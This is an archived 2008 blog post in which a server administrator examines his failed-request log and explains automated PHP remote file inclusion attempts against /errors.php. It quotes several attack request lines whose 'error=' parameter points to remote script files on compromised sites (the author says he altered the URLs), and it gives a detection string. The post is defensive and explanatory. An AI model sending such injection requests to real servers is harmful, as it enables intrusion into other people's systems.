Are nasty programs looking for security holes on your server?
Archive - Originally posted on "The Horse's Mouth" - 2008-02-17 06:51:25 - Graham EllisLooking through my log file reports for the last week, I have found the following in my "failed requests" log.
546: /errors.php
52: /errors.php?error=http://www.beautiful-america.com/admin/id.txt?
42: /errors.php?error=http://www.ticarbon.de/phpBB2/files/i?
32: /errors.php?error=http://test.iearn.uz/test.iearn.uz/assist.txt???
27: /errors.php?error=http://www.dg-mitteldeutschland.de/sys_crank/i?
26: /errors.php?error=http://hornydate.co.uk/sparky.txt??
25: /errors.php?error=http://www.sternkinder2007.de/video/lol?So what are these requests? Should I be worried?
They're attempts to break into my system. But I'm not being particularly targeted - this is an automated attack, attempting to call on a script which I don't have to run code that's held on those remote sites which have previously been compromised. And if they succeed, they they'll set the same hole up on my system and carry on to the next.
The particular accesses above actually don't worry me - they were all "404"d - but rather they form a warning of the dangers of allowing external code to be included in PHP.
Visiting the URLs given as the "error=" parameter, I find a variety of "not found" pages which means that the hole has not been closed on the remote system, and nasty pieces of PHP which mean that the remote machine is still compromised. (If you, reading this article, visit any of them you should get a 404 as I have distorted the URLs that were live - I don't want to make this into a "how to break in" manual page!). But I do have copies of the scripts that I can show bona fide delegates on our PHP courses, and of the futher log details of the programs (often in Perl) that are injected.
If you are worried about being infected, the particular attack file contains the string "Mic22" - so if you search for that ...